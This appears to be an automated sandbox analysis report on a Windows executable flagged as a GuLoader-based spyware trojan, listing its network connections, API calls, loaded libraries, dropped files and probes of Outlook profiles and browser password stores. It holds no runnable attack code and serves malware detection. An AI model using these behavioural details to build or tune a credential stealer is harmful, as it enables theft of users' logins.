Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49912
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50042
Source: unknown	Network traffic detected: HTTP traffic on port 50054 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50046
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50048
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown	Network traffic detected: HTTP traffic on port 50030 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50052
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50044 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827

Source: unknown	HTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.5:49827 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.18.97:443 -> 192.168.2.5:49835 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49912 version: TLS 1.2

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe

Code function: 0_2_0040558F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040558F

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_004034A5
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		3_2_004034A5

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 0_2_00404DCC	0_2_00404DCC
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 0_2_00406AF2	0_2_00406AF2
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 0_2_6F971B5F	0_2_6F971B5F
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_00404DCC	3_2_00404DCC
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_00406AF2	3_2_00406AF2
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_00164328	3_2_00164328
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_001666B8	3_2_001666B8
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_00168DA0	3_2_00168DA0
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_001619B8	3_2_001619B8
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_00165F90	3_2_00165F90
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_00162DD1	3_2_00162DD1
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_348ACCA0	3_2_348ACCA0
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_348A7EE4	3_2_348A7EE4
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_348A7628	3_2_348A7628
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_348AC638	3_2_348AC638
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_348A03C4	3_2_348A03C4
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_348A331A	3_2_348A331A
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_348ACC91	3_2_348ACC91
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_348AB4EC	3_2_348AB4EC
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_348ABD88	3_2_348ABD88
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_348A6E91	3_2_348A6E91
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_348A6EA0	3_2_348A6EA0
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_348ADEE1	3_2_348ADEE1
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_348AE79F	3_2_348AE79F
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_348A7848	3_2_348A7848
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_348AF042	3_2_348AF042
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_348AB07F	3_2_348AB07F
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_348A69CB	3_2_348A69CB
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_348AC1F2	3_2_348AC1F2
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_348AB944	3_2_348AB944
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_348ADA89	3_2_348ADA89
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_348A6A43	3_2_348A6A43
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_348AEBF7	3_2_348AEBF7
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_348AE339	3_2_348AE339
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_37638650	3_2_37638650
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_376396C8	3_2_376396C8
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_37639D10	3_2_37639D10
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_3763BDF0	3_2_3763BDF0
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_3763A360	3_2_3763A360
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_3763A9B0	3_2_3763A9B0
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_37630040	3_2_37630040
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_37633F60	3_2_37633F60
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_37633F70	3_2_37633F70
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_37635F01	3_2_37635F01
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_37635F10	3_2_37635F10
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_3763AFE8	3_2_3763AFE8
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_3763AFF7	3_2_3763AFF7
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_3763AFF8	3_2_3763AFF8
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_376367C0	3_2_376367C0
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_37630FA8	3_2_37630FA8
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_376367B0	3_2_376367B0
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_37635660	3_2_37635660
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_37638640	3_2_37638640
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_37635650	3_2_37635650
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_37632E10	3_2_37632E10
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_376336C0	3_2_376336C0
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_376336B0	3_2_376336B0
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_376396B8	3_2_376396B8
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_37632560	3_2_37632560
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_37632550	3_2_37632550
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_37639D00	3_2_37639D00
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_37634DA0	3_2_37634DA0
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_37634DB0	3_2_37634DB0
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_37631400	3_2_37631400
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_37636C09	3_2_37636C09
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_37636C18	3_2_37636C18
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_376374C8	3_2_376374C8
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_37631CA0	3_2_37631CA0
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_37631CB0	3_2_37631CB0
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_376374B8	3_2_376374B8
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_37636368	3_2_37636368
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_37637B4F	3_2_37637B4F
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_3763A352	3_2_3763A352
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_37636358	3_2_37636358
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_37633B08	3_2_37633B08
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_37633B18	3_2_37633B18
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_376343C8	3_2_376343C8
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_376343B9	3_2_376343B9
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_37633268	3_2_37633268
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_37635207	3_2_37635207
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_37635208	3_2_37635208
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_37635AA8	3_2_37635AA8
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_37635AB8	3_2_37635AB8
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_3763BA97	3_2_3763BA97
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_3763F130	3_2_3763F130
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_37632108	3_2_37632108
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_3763A9A0	3_2_3763A9A0
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_376329A8	3_2_376329A8
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_376329B8	3_2_376329B8
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_37637061	3_2_37637061
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_37637070	3_2_37637070
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_37631858	3_2_37631858
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_37634820	3_2_37634820
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_37634810	3_2_37634810
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_37B6E7C8	3_2_37B6E7C8
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_37B6D608	3_2_37B6D608
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_37B68328	3_2_37B68328

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe

Code function: String function: 00402C41 appears 51 times

Source: 2CQ2zMn0hb.exe, 00000000.00000000.2039225016.0000000000455000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs 2CQ2zMn0hb.exe
Source: 2CQ2zMn0hb.exe, 00000003.00000002.3286663082.0000000004462000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 2CQ2zMn0hb.exe
Source: 2CQ2zMn0hb.exe, 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs 2CQ2zMn0hb.exe
Source: 2CQ2zMn0hb.exe, 00000003.00000002.3306446363.00000000346E7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs 2CQ2zMn0hb.exe
Source: 2CQ2zMn0hb.exe	Binary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs 2CQ2zMn0hb.exe

Source: 2CQ2zMn0hb.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/8@6/5

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_004034A5
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		3_2_004034A5

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe

Code function: 0_2_00404850 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_00404850

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe

Code function: 0_2_00402104 CoCreateInstance,

0_2_00402104

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe

File created: C:\Users\user\AppData\Local\Iw

Jump to behavior

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe

File created: C:\Users\user\AppData\Local\Temp\nsj15BD.tmp

Jump to behavior

Source: 2CQ2zMn0hb.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 2CQ2zMn0hb.exe, 00000003.00000002.3307726397.00000000358ED000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 2CQ2zMn0hb.exe	ReversingLabs: Detection: 60%
Source: 2CQ2zMn0hb.exe	Virustotal: Detection: 76%

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe

File read: C:\Users\user\Desktop\2CQ2zMn0hb.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\2CQ2zMn0hb.exe "C:\Users\user\Desktop\2CQ2zMn0hb.exe"
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process created: C:\Users\user\Desktop\2CQ2zMn0hb.exe "C:\Users\user\Desktop\2CQ2zMn0hb.exe"
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process created: C:\Users\user\Desktop\2CQ2zMn0hb.exe "C:\Users\user\Desktop\2CQ2zMn0hb.exe"	Jump to behavior

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: 2CQ2zMn0hb.exe

Static file information: File size 1052225 > 1048576

Source: 2CQ2zMn0hb.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000000.00000002.2380434486.00000000032B8000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe

Code function: 0_2_6F971B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_6F971B5F

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe

File created: C:\Users\user\AppData\Local\Temp\nsf16D9.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
